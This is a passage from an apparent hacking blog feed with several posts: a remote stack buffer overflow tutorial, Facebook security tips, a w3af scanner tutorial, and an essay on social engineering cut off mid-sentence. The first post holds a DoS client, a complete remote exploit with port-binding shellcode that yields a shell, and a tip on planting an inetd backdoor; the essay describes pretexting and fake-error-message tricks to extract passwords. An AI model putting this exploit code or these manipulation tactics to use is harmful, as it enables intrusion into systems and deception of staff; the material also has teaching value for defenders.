/>Connected to localhost.<br /><br />Escape character is '^]'.<br /><br />My name is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br />Now the telnet client should be disconnected... but why? Let's look at the output of gdb:<br /><br />Program received signal SIGSEGV, Segmentation fault.<br /><br />0x41414141 in ?? ()<br /><br />(gdb)<br /><br />// Don’t close gdb !!<br /><br />What happened? As we can see, the eip is set to 0x41414141, probably you are asking why?<br /><br />OK, I’ll try to explain it. 0x41 stands for an ‘A’... as we put over 1024 bytes in, the program has tried to copy the string name[2048] into<br /><br />buffer[1024].... so because the string in name[2048] was greater than 1024 bytes, the name buffer has overwritten the buffer<br /><br />and also overwritten the saved eip (extended instruction pointer, here is the returnaddress stored).. so our buffer<br /><br />looks like this:<br /><br />[xxxxxxxx-name-2048-bytes-xxxxxxxxxx]<br /><br />[xxxxx buffer-only-1024-bytes xxx] [EIP]<br /><br />Ok our stack should look like this. We’ve tried to put more than 1024 byte into buffer, and then we’ve overwritten the eip *g*.<br /><br />// don't forget .. eip has a size of 4 bytes !<br /><br /><br /><br />After you overwrote the whole returnaddress, the function wanted to return to the main function, it jumped to the<br /><br />wrong address (0x41414141) .... and so there was a segmentation fault.<br /><br />Now here's a DoS tool for this program:<br /><br />------------------------------------- dos.c ------------------------------------------------------------<br /><br />#include <stdio.h><br /><br />#include <netinet/in.h><br /><br />#include <sys/socket.h><br /><br />#include <sys/types.h><br /><br />#include <netdb.h><br /><br />int main(int argc, char **argv)<br /><br />{<br /><br />struct sockaddr_in addr;<br /><br />struct hostent *host;<br /><br />char buffer[2048];<br /><br />int s, i;<br /><br />if(argc != 3)<br /><br />{<br /><br />fprintf(stderr, "usage: %s <host> <port>\n", argv[0]);<br /><br />exit(0);<br /><br />}<br /><br />s = socket(AF_INET, SOCK_STREAM, 0);<br /><br />if(s == -1)<br /><br />{<br /><br />perror("socket() failed\n");<br /><br />exit(0);<br /><br />}<br /><br />host = gethostbyname(argv[1]);<br /><br />if( host == NULL)<br /><br />{<br /><br />herror("gethostbyname() failed");<br /><br />exit(0);<br /><br />}<br /><br />addr.sin_addr = *(struct in_addr*)host->h_addr;<br /><br />addr.sin_family = AF_INET;<br /><br />addr.sin_port = htons(atol(argv[2]));<br /><br /><br /><br />if(connect(s, &addr, sizeof(addr)) == -1)<br /><br />{<br /><br />perror("couldn't connect so server\n");<br /><br />exit(0);<br /><br />}<br /><br />/* Not difficult only filling buffer with A’s.... den sending nothing more */<br /><br />for(i = 0; i < 2048 ; i++)<br /><br />buffer[i] = 'A';<br /><br />printf("buffer is: %s\n", buffer);<br /><br />printf("buffer filled... now sending buffer\n");<br /><br />send(s, buffer, strlen(buffer), 0);<br /><br />printf("buffer sent.\n");<br /><br />close(s);<br /><br />return 0;<br /><br />}<br /><br />--------------------------------------------- EOF ------------------------------------------------------<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />4. Finding the return address<br /><br /><br /><br />I only want to show you how the structure is of an remote exploit looks like, so let's find out what we are going to do:<br /><br />First we open gdb and search for the esp... to find esp you can put in the gdb.. (I hope you didn't close gdb) after getting a SEGFAULT... ok now type this x/200bx $esp-200 in, so you should get an ouput of addresses... It should look like this :<br /><br />(gdb) x/200bx $esp-200<br /><br />0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff604: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff614: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff624: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff634: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff644: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff674: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff67c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />---Type <return> to continue, or q <return> to quit---<br /><br />Ok know we know that we've overwritten the whole buffer, so let's take one of those addresses... I'll show you later<br /><br />why this... (because we want to guess the address), maybe you know the NOP's technique... so it shouldn't be any problem to<br /><br />make our exploit working as well.... or to make our chance bigger to guess the return-address.<br /><br />Attention don’t take the nearest address near the end of the 0x41, take an address which is in the middle, we’ll overwrite it later with NOPs.<br /><br /><br /><br />5. Structure of the exploit code<br /><br />So we've got a possible return address, let's try to use it... the exploit code should be structured like this:<br /><br />1. First let's find out the esp.. ok we've got it. (ok we've got an address near the esp, that isn't any problem, because we’ll fill the buffer with NOP's)... then you should find a good shellcode which binds a shell on a port... Don't forget: in remote exploits we can't use local exploit shellcodes.. ok we could, but it isn’t very clever. So we have to find another way to get a shell. What about a portbinder shellcode, which binds a shell on a port ??<br /><br />Ok in the net are many of these portbinder shellcodes .. i.e. www.hack.co.za or my page *g*.<br /><br />2. Declaring a buffer which is bigger than 1024 bytes... let's make it 1064 bytes, so there is no problem to overwrite eip.. so don't forget you only have to declare a buffer which is greater than 1024 bytes...<br /><br />3. Let's prepare the buffer. Now let's first fill the whole buffer with NOP's:<br /><br />memset(buffer, 0x90, 1064);<br /><br /><br /><br />4. Let's copy the shellcode into the buffer<br /><br />memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode));<br /><br />Here we put the shellcode in the middle of the buffer<br /><br />Why? Ok, if we got enough NOPS at the beginnig, our chance is getting better to execute the shellcode<br /><br />5. Let's terminate the Nullbyte in the buffer<br /><br />buffer[1000] = 0x90; // 0x90 is the NOP in hexadecimal<br /><br />6. Let's copy the returnaddress at the end of the buffer<br /><br />for(i = 1022; i < 1059; i+=4)<br /><br />{<br /><br />((int *) &buffer[i]) = RET;<br /><br />// RET is the returnaddress we want to use... #define in the header<br /><br />}<br /><br />We know that the buffer ends by 1024 bytes, but to get sure we begin on 1022, then we’re copying the returnaddress until we’ve got 1059 bytes.. that is enough because we've already overwritten the eip (we hope so *g*).<br /><br />7. Let's add a \0 Nullbyte at the end of our prepared buffer:<br /><br />buffer[1063] = 0x0;<br /><br />Now we've prepared our buffer, now we only need to send it to the vulnerable host.. by port and host or ip.<br /><br />-------------------------------------------- exploit.c --------------------------------------------------<br /><br />/* Simple remote exploit, which binds a shell on port 3789<br /><br />* by triton<br /><br />*<br /><br />* After return address was overwritten, you can connect<br /><br />* with telnet or netcat to the victim host on Port 3789<br /><br />* After you logged in... there’s nothing, but try to enter "id;" (don’t forget the semicolon)<br /><br />* So you should get an output, ok you’ve got a shell *g*. Always use:<br /><br />*<br /><br />* <command>;<br /><br />*<br /><br />* execute.<br /><br />*/<br /><br />#include <stdio.h><br /><br />#include <netdb.h><br /><br />#include <netinet/in.h><br /><br />//Portbinding Shellcode<br /><br />char shellcode[] =<br /><br />"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"<br /><br />"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"<br /><br />"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"<br /><br />"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"<br /><br />"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"<br /><br />"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"<br /><br />"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"<br /><br />"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";<br /><br />//standard offset (probably must be modified)<br /><br />#define RET 0xbffff5ec<br /><br /><br /><br />int main(int argc, char *argv[]) {<br /><br />char buffer[1064];<br /><br />int s, i, size;<br /><br />struct sockaddr_in remote;<br /><br />struct hostent *host;<br /><br />if(argc != 3) {<br /><br />printf("Usage: %s target-ip port\n", argv[0]);<br /><br />return -1;<br /><br />}<br /><br />// filling buffer with NOPs<br /><br />memset(buffer, 0x90, 1064);<br /><br />//copying shellcode into buffer<br /><br />memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));<br /><br />// the previous statement causes a unintential Nullbyte at buffer[1000]<br /><br />buffer[1000] = 0x90;<br /><br />// Copying the return address multiple times at the end of the buffer...<br /><br />for(i=1022; i < 1059; i+=4) {<br /><br />* ((int *) &buffer[i]) = RET;<br /><br />}<br /><br />buffer[1063] = 0x0;<br /><br />//getting hostname<br /><br />host=gethostbyname(argv[1]);<br /><br />if (host==NULL)<br /><br />{<br /><br />fprintf(stderr, "Unknown Host %s\n",argv[1]);<br /><br />return -1;<br /><br />}<br /><br />// creating socket...<br /><br />s = socket(AF_INET, SOCK_STREAM, 0);<br /><br />if (s < 0)<br /><br />{<br /><br />fprintf(stderr, "Error: Socket\n");<br /><br />return -1;<br /><br />}<br /><br />//state Protocolfamily , then converting the hostname or IP address, and getting port number<br /><br />remote.sin_family = AF_INET;<br /><br />remote.sin_addr = *((struct in_addr *)host->h_addr);<br /><br />remote.sin_port = htons(atoi(argv[2]));<br /><br />// connecting with destination host<br /><br />if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)<br /><br />{<br /><br />close(s);<br /><br />fprintf(stderr, "Error: connect\n");<br /><br />return -1;<br /><br />}<br /><br />//sending exploit string<br /><br />size = send(s, buffer, sizeof(buffer), 0);<br /><br />if (size==-1)<br /><br />{<br /><br />close(s);<br /><br />fprintf(stderr, "sending data failed\n");<br /><br />return -1;<br /><br />}<br /><br />// closing socket<br /><br />close(s);<br /><br />}<br /><br />--------------------------------------------- EOF-------------------------------------------------------<br /><br />7. Using the exploit<br /><br />user@linux~/ > gcc exploit.c –o exploit<br /><br />user@linux~/ > ./exploit <host> <port><br /><br />Now it should work If you got the right return address... or one of the right return addresses.<br /><br />user@linux~/ > telnet <host> 3879<br /><br />If you’re connected then try to do this:<br /><br />id;<br /><br />uid=500(user) gid=500(user) groups=500(user)<br /><br />As you can see, it works very well.<br /><br /><br /><br /><br /><br />8. Getting root privileges<br /><br />Do the following:<br /><br />user@linux~/ > su<br /><br />password: ******<br /><br />root@linux~/ > ls –ln vulnerable<br /><br />-rwxrwxr-x 1 500 500 14106 Jun 18 14:12 vulnerable<br /><br />root@linux~/ > chown root vulnerable<br /><br />root@linux~/ > chmod 6755 vulnerable<br /><br />root@linux~/ > ./vulnerable <port><br /><br />Now you can exploit the server program, and you should get a root shell *g*<br /><br />9. Enter the service in inetd.conf<br /><br />Ok we’re interested how the program, would work, if it would be a deamon. Now do the following:<br /><br />First copy the vulnerable pogram to /usr/bin/<br /><br />root@linux~/ > cp vulnerable /usr/bin/vulnerable<br /><br />Now let’s modify some files...<br /><br />root@linux~/ > vi /etc/services<br /><br />(Feel free to use your favourite editor instead of vi)<br /><br />Define a port which you wanna take. I’ll take the port 1526, now let’s enter this informations into /etc/services<br /><br />vulnerable 1526/tcp # defining port for our server program, save and quit<br /><br />Now edit the inetd.conf file<br /><br />root@linux~/ > vi /etc/inetd.conf<br /><br />put in:<br /><br />vulnerable stream tcp nowait root /usr/bin/vulnerable vulnerable 1526<br /><br />Now safe the inetd.conf file and quit.<br /><br />root@linux~/ > killall –HUP inetd<br /><br />Now restart inetd and everything should work..<br /><br />Note: This is also a good way to make a backdoor, adding a service in /etc/services then, add the things in inetd.conf and right /bin/sh sh –i or sh –h *g*....<br /><br />9. Problem solutions<br /><br />If the exploit doesn’t work, please think about the return address, it could be wrong, test it with gdb....<br /><br />user@linux~/ > gdb vulnerable<br /><br />.....<br /><br />(gdb) run <port><br /><br />Now you can exploit the program, if it doesn’t work look at the output of gdb, and try to find out the address, like in Chapter 4.<br /><br />If there any other problems ... read the remarks *g*.<br /><br />10. Remarks<br /><br />If you find a bug, please mail me, so I can correct the current Version. If you want to criticize my english, I’ll delete your message :-) *nobody’s perfect*, but if you really got problems to understand this, please ask me... But please do not tease me with stupid question, I don’t have the time to answer every question.<br /><br />If you want to put this text on your page, no problem, but please do not change the copyright or other things....<br /><br />11. Greets<br /><br />Thanks to Maverick for the vulnerable programm *hehe* (in his Tutorial "Socket Programming"),<br /><br />thanks to triton for the exploitcode (great man, also member of buha-security.de)<br /><br />Greets to all members of buha-security.de and greets to XaitaX, cat, Anthraxx, Jess (I wonder what happend with her), DrDoo (knuff)<br /><br />and of course one of my best friends Richard Hirner (well I know him 1,2 year ago, but we didn't meet us.... *g*..)... at least greets to all apprentices of LGT Bank in Liechtenstein, special greets to Marc, Etienne, Martina... (Toni from Hospital too, my own appretice)<br /><br /><br /></b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com0tag:blogger.com,1999:blog-3299468824600484367.post-46914106918810892402011-09-28T06:12:00.000-07:002011-09-28T06:12:50.013-07:008 Top Facebook Security Tips<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
</div>
<div style="text-align: center;">
<span style="color: blue; font-size: small;"><b>FACEBOOK TIPS</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCoIjTf1eDvkp6TeEXgzyrUWvJiANoQN9kcPLdo-OZw8g2ghU18WguEScpinoG3Xw5xL-X-tWtirMhY7Nw1NkCeLa55PrmALqoqtcq-1yc32iKolPaiQNl_KJMKg5QFbu8gi2F19_Nc8/s1600/facebook-logo1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCoIjTf1eDvkp6TeEXgzyrUWvJiANoQN9kcPLdo-OZw8g2ghU18WguEScpinoG3Xw5xL-X-tWtirMhY7Nw1NkCeLa55PrmALqoqtcq-1yc32iKolPaiQNl_KJMKg5QFbu8gi2F19_Nc8/s320/facebook-logo1.png" width="320" /></a></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><br />World wide web is now expending, Internet has successfully turn the whole world into a village and for doing this social networks played and playing an important role, in the era of social networks there is a facebook, Facebook has a large number of user's and it is on hit list of attacker's and scam-er. <br />While you are using facebook or any social networking website there is a need to protect your information by using effective privacy techniques. <br />This article will talk about some security issues and their countermeasure on facebook or it can be applicable on other social networking websites.<br /><br /><span style="color: #073763;"> Strong Passwords</span><br /><br />You must care about your passwords, make sure you have a strong password that contain capital letters,small letters,numbers and special characters. Use different password for different online accounts, your password must not related to some of your information, do not use such a words that are easily available on dictionary. To learn more about dictionary attack click here.<br /><br /><span style="color: #073763;">Secure Browsing </span><br />It is good practice to keep yourself up to date means make sure that you are using update OS and browser to avoid browser exploitation attack, use secure connection (HTTPS) where possible to avoid sniffing.<br /><br style="color: #073763;" /><span style="color: #073763;">Computer Security </span><br />It is very important to stay secure on web, make sure your computer does not contain any sort of keyloggers, RAT (remote administration tool) and istealer or some other things like this. Use a smart antivirus and firewall solution to remain secure, if you think that your computer got affected by some malware and than follow the procedure to fight with.<br /><br style="color: #073763;" /><span style="color: #073763;">Personal Information </span><br />Avoid to put so much information about yourself on facebook profile, a hacker might be use these information to hack your password by using reverse engineering technique, or an attacker might create a dictionary by using your information to launch a password based attack.<br /><br style="color: #073763;" /><span style="color: #073763;">Profile Privacy Setting</span><br />It is recommended to make your profile as a privacy master profile, hide your information from those people to whom you never trust and from those people who are new to you, disable each and everything from those who have not added into your profile as a friend, because there is chance that someone watching your activities.<br /><br style="color: #073763;" /><br style="color: #073763;" /><span style="color: #073763;">Application Setting</span><br />Each facebook application has a default setting and when you allow any application to use, it means that you have signed an agreement and the developer of this application may watch all of your activities and can get your password, can update your status and more, so avoid applications as much as possible. To learn more about application spamming click here.<br /><br /><span style="color: #073763;"> Account Security </span><br />It is good practice to add different email address for your single profile and must connect your mobile phone with your profile, in case if you lost your account than you have an ability to prove as a owner of this account, lean more security to protect your account.<br /><br /><span style="color: #073763;">More Tips</span><br style="color: #073763;" /><br /> You must not share your password to any one.<br /> Disable your browser from saving your password.<br /> Avoid to sign in your account when you are in public place.<br /> If you are using wireless LAN(WLAN) than must think about firesheep. </b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com0tag:blogger.com,1999:blog-3299468824600484367.post-66869504341949614212011-09-28T06:08:00.000-07:002011-09-28T06:08:37.573-07:00Web Application Attack and Audit Framework (W3AF)- Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB8_C1oKrTm_BJxX3qwGPNCLbfHEnGLtZBO1kn1sLOn1C-tNa9pE5oDbmCMX0E-jD8bpVUhkwRIS6a1ePi3q-L5lnfrvp5RKg3WnIRHNoSDWQW7QdxHRDMidQY4nZL2m_4XM6zSG5MaAk/s1600/waf.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB8_C1oKrTm_BJxX3qwGPNCLbfHEnGLtZBO1kn1sLOn1C-tNa9pE5oDbmCMX0E-jD8bpVUhkwRIS6a1ePi3q-L5lnfrvp5RKg3WnIRHNoSDWQW7QdxHRDMidQY4nZL2m_4XM6zSG5MaAk/s320/waf.jpeg" width="320" /></a></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><br />Security is key point for every effective business, either you are running your own website or you are at job to manage the web application for your company you have to do little penetration testing to check the security of web application.<br />Now a days exploit are available and update on daily basis for different web application services.<br /><br />While doing a penetration testing a pen tester must consider these exploit for different vulnerabilities.<br />To find a vulnerabilities is not enough a pen-tester must check the parallel exploits that are available publicly for different services.<br /><br /><br />w3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af is working for Become the best Open Source Web Application Exploitation Framework. It provides information about security vulnerabilities and aids in penetration testing efforts.<br /><br />The important fact of w3af is that it is available for all major operating system like Microsoft Windows, Linux, MAC OS, FreeBSD and OpenBSD etc. It is written in python programming language and provide both command line interface and graphical user interface.<br /><br />W3af_15<br /><br />W3af uses more than 130 plug-in to find vulnerabilities in web applications, after finding vulnerabilities like SQL injections, OS commanding, remote file inclusions (PHP), cross-site scripting (XSS), and unsafe file uploads, can be exploited in order to gain different types of access to the remote system.<br /><br />Download <br />Tutorial<br />Once you have all the prerequisites then you can start w3af as follows:<br />$ ./w3af<br />w3af>>><br /><br />Type help will give you a list of options.<br /><br /><br />w3af>>> help<br />The following commands are available:<br /><br />help You are here. help [command] prints more specific help.<br />url-settings Configure the URL opener.<br />misc-settings Configure w3af misc settings.<br />session Load and save sessions.<br />plugins Enable, disable and configure plugins.<br />start Start site analysis.<br />exploit Exploit a vulnerability.<br />tools Enter the tools section.<br />target Set the target URL.<br />exit Exit w3af.<br /><br />w3af>>><br />Now see this example:<br /><br />w3af/plugins>>> audit xss<br />w3af/plugins>>> audit<br />Enabled audit plugins:<br />xss<br />w3af/plugins>>> discovery webSpider,pykto,hmap<br />w3af/plugins>>> discovery<br />Enabled discovery plugins:<br />webSpider<br />pykto<br />w3af/plugins>>> output console,htmlFile<br />w3af/plugins>>> output<br />Enabled output plugins:<br />htmlFile<br />console<br />w3af/plugins>>> output config htmlFile<br />w3af/plugin/htmlFile>>> view</b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com2tag:blogger.com,1999:blog-3299468824600484367.post-13062286699178881812011-09-20T05:29:00.000-07:002011-09-20T05:33:08.779-07:00Social Engineering<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0m-2JOm6woKcIRwMRwKtk78RKF3x9QqS1XHeI-5W3B2icJ9yi6pz8eWu09_fVwYLrGouaddwC_XzBARhAGzxI_KMvHcMpIXEApJvXdeDtVlbe1HZvhS6xgDwJ6Cik4eBlax2ObkIoI8U/s1600/chalkboard.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0m-2JOm6woKcIRwMRwKtk78RKF3x9QqS1XHeI-5W3B2icJ9yi6pz8eWu09_fVwYLrGouaddwC_XzBARhAGzxI_KMvHcMpIXEApJvXdeDtVlbe1HZvhS6xgDwJ6Cik4eBlax2ObkIoI8U/s320/chalkboard.jpg" width="320" /></a></div>
<span style="font-size: small;"><b><br />Why use Social Engineering?<br /><br />The reasons for using social engineering to gain access are simple: once mastered, social engineering can be used on a system despite the platform or the quality of the hardware and software present. Social engineering comes in many forms, but they are all based on the principle of disguising oneself as a non-hacker who needs or deserves the information to gain access to the system. Aside from user larger security systems, another tactic that security professionals employ is 'security through obscurity,' which is providing little or no information to a user, assuming that legitimate users have already been trained, and that the hackers would be discouraged by having to guess different commands or procedures. Security through obscurity methods can also be accomplished by hiding certain files or information systems or having confusing login prompts. This method of security is completely undermined when social engineering is involved. With a legitimate human user providing information, all the information that allowed for security through obscurity would also be divulged to the hacker.<br /><br />Methods of Attack?<br /><br />Although the methods used by social engineers rely on the same principle, the disguises of the hackers may vary greatly, depending on the hacker's level of skill and the type of information he or she is after. One common method used is for the attacker to pretend he is new to the system and needs assistance with gaining access. The role as a new person (or 'newbie' or 'neophyte') is easy for a potential hacker to pull off. The hacker can easily pretend to not know much about a system and still retrieve information. This ruse is commonly used when the attacker is unable to research enough about the company or find enough information to get a foot in the door. A simple method of this technique is for the hacker to call a secretary for the company and pretend that he is a new temp agent and is having trouble gaining access into the system. The secretary (or other legitimate user) may be inclined and proud to be able to offer help to the new person on the job. The user may simply give out the guest account name and password, or may even go into detailed instructions on login procedures for different departments. Once the intruder is in a guest account however, he may be able to access other (more important) accounts from there. He may also be able to find out enough information about the company to use a similar tactic: reverse social engineering, which is covered in the next section.<br /><br />Other guises used by social engineers are to pose as a computer aide or helper, and try to gain information as you fix the computer. This technique, however, relies on the assumption that there is something wrong with the computer system. By posing as a helper, the legitimate user will be less suspicious and more willing to answer your inquisitive questions. Another form for the attacker to take is that of a system operator for the network itself. The potential hacker will pretend that an error in all the accounts has been made, and the he needs to reset the accounts. In order to do that, he needs the old passwords of the users. If the employee is naive enough, he or she will divulge the information, thinking that they are doing their company a service. Although there are many other methods and techniques, these previous examples account for most recorded incidents of social engineers.<br /><br />The disguises and tricks that the hackers use to social engineer legitimate users do have limits, however. During a social engineering attack, the hacker assumes a great deal and also relies on luck to pull off a successful hack. The above examples usually only work on employees who are not aware of the different forms of social engineering, or that they don't care about the company's security. Even if an employee is not aware of social engineering, he or she may not trust who the hacker is without proper identification. The employee may also be aware that temp agents usually have contact managers or other people within their own office to assist them, and would be suspicious when the call comes to their desk. These problems are a constant danger to the potential hacker, which has called for a new type of social engineering- called reverse social engineering.<br /><br />Reverse Social Engineering<br /><br />Reverse social engineering is a superior form of social engineering that deals with the common difficulties that come with normal social engineering. This form can be described as a legitimate user of a system asking the hacker questions for information. In reverse social engineering (RSE), the hacker is thought to be a higher-level that the legitimate user, who is actually a target. In order to pull of an RSE attack, however, the attacker must be knowledgeable of the system and usually must also have previous access granted to him, usually through normal social engineering. A quick glance of the some pros and cons of SE and RSE are given here:<br /><br />Social Engineering: The hacker places the calls and is dependent on the user<br />Reverse Social Engineering: The user places the calls and are dependent the hacker<br /><br />Social Engineering: The user feels that the hacker is indebted to them.<br />Reverse Social Engineering: The user feels indebted to the hacker.<br /><br />Social Engineering: Questions often remain unresolved to the victim.<br />Reverse Social Engineering: All the problems are corrected, no suspicious loose ends<br /><br />Social Engineering: The user has control by providing information.<br />Reverse Social Engineering: The hacker has complete control.<br /><br />Social Engineering: Little or no preparation required.<br />Reverse Social Engineering: Lots of planning and previous access usually needed<br /><br />The typical RSE attack consists of three major parts: sabotage, advertising, and assisting. After gaining simple access through other means, the hacker sabotages a workstation by either corrupting the station, or giving the appearance that it is corrupted. An abundance of error messages, switched parameters/options, or simulation programs such as fake prompts can accomplish this type of sabotage. The user of the system sees the malfunctions, and then tries to seek help. In order to be the one that the users call, the attacker must advertise that he or she is capable of fixing the problem. Advertising may include placing fake business cards around the office or even providing the number to call in the error message itself. A sample error message might be:<br /><br />** ERROR 03 - Restricted Access Denied ** - File access not allowed by user. Consult with Mr. Crack at () 595-1474 for file permission information.<br /><br />In this case, the user would call 'Mr. Downs' for help, and divulge account information without being suspicious of the legitimacy of 'Mr. Downs.' Another method of advertisement can actually involve social engineering. An example of this is for the hacker to call the target and inform them that the new technical support number has changed, and then the hacker would give them their own number. The third (and easiest) part of an RSE attack is for the hacker to assist with the problem. Since the hacker is the instigator of the sabotage, the problem is easily fixed, and the target is not suspicious of the helper since he or she appears to be a knowledgeable user of the system. The duty of the hacker is only to get account information out of the target while he is helping them. After the information is attained, the hacker solves the problem and then ends the conversation, eager to use his newfound knowledge.<br /><br />Why Social Engineering Works<br /><br />The use of social engineering and reverse social engineering are common because they often work under good conditions and take less time (and sometimes less knowledge) to pull off than brute-force attacks. They work because all humans have certain psychiatric characteristics that can be taken advantage of. Such characteristics are diffusion of responsibility, ingratiation opportunties, and moral duty. Diffusion of responsibility is used when the legitimate user feels that he or she is not solely responsible for their actions, which allows them to give up information more easily. A user may also divulge information if they feel that are doing something that will help them in the future, such as getting their boss out of a jam. Moral duty is played on when the target believes that they are helping the company with a problem, and they are often glad to help. There are other factors that allow social engineers to be successful, such as the use of guilt and personal persuasion.<br /><br />Methods of Prevention<br /><br />As social engineering and reverse social engineering become more prevalent, companies and network managers are trying to stop the attacks from being successful. Companies concerned with security realize that the great amounts of money spent on upgrades and security kits are being wasted if they can't prevent SE and RSE attacks. The simple answer to preventing these attacks is education. A knowledgeable user of a system can easily be told to never give out account information without pen-nission of a supervisor. The users should be aware of the common methods of SE attacks, and should always report suspicious behavior. While catching on to RSE attacks is much harder, the users should still be aware of who to trust when a problem occurs. Since social engineers can attack any employee for information, all employees should be concerned with methods of attacks. Hackers know that low-level employees and users with 